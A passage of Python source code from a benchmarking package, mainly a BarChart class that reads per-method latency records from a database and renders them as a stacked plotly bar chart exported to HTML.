index=False
)
else:
raise UnableToExportVisualization()
```
#### File: Benchmarking/visualizations/bar_graphs.py
```python
from .._utilities.exceptions import UnableToGenerateVisualizations, UnableToExportVisualization
from .._database.collection import Crud
from datetime import datetime
import plotly.graph_objects as go
import pandas as pd
import os
class BarChart(Crud):
def __init__(self, test_case_name: str, database_connection_url: str, test_ids=None, order_by="latency") -> None:
"""
:param test_case_name:
:param database_connection_url:
:param test_ids:
:param order_by:
"""
super(BarChart, self).__init__()
# Sorting out the test-id's
self.test_case_name = test_case_name
self.database_name = database_connection_url
self._order_by = order_by
if test_ids is None or type(test_ids) is not list:
raise UnableToGenerateVisualizations()
else:
self.list_of_test_ids = test_ids
# Gathering relevant performance metrics
self.statistics = {}
for tid in self.list_of_test_ids:
self.statistics[tid] = self.select_benchmark_call_stack_by_test_id(
url=database_connection_url,
tcn=test_case_name,
test_id=tid
)
self.json = self.generate_json()
def generate_json(self) -> list:
"""
:return:
"""
payload = []
for tid in self.list_of_test_ids:
for row in self.statistics[tid]:
if row['parent_function_name'] == row['sample_id']:
method_signature = row['child_function_name']
else:
method_signature = f"{row['parent_function_name']}/{row['child_function_name']}"
payload.append(
{
"sample_id": row['sample_id'],
"test_id": tid,
"method_signature": method_signature,
"latency": row['cumulative_time']
}
)
return sorted(payload, key=lambda k: k[self._order_by], reverse=True)
def render_html(self) -> str:
"""
:return:
"""
df = pd.DataFrame(self.json)
fig = go.Figure()
fig.update_layout(
title="<span style='font-size: 22px;'>Benchmarking Method Performance Bar Chart</span>",
template="ggplot2",
xaxis=dict(title_text="Test-id's"),
yaxis=dict(title_text="Time spent in seconds"),
barmode="stack",
font=dict(
size=12,
)
)
for method_signature in df.method_signature.unique():
plot_df = df[df.method_signature == method_signature]
fig.add_trace(
go.Bar(
x=[plot_df.test_id, plot_df.sample_id],
y=plot_df.latency,
name=method_signature,
meta=[method_signature],
hovertemplate='<br>Test-ID: %{x[0]}</b>'
'<br>Sample-ID: %{x[1]}</b>'
'<br>method name: %{meta[0]}</b>' +
'<br>Time Spent %{y}</b>' +
'<extra></extra>'
),
)
return fig.to_html(config={"displaylogo": False})
def export(self, path: str) -> None:
"""
Export the bar chart as a HTML report on disk.
:param path: The path on disk where the file needs to be written.
Example: C:\\temp\\
"""
if os.path.isdir(path):
name = f"BarChart-{self.test_case_name}-{datetime.now().timestamp()}"
with open(f"{path}{name}.html", 'a') as file:
file.write(self.render_html())
else:
raise UnableToExportVisualization()
``` |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.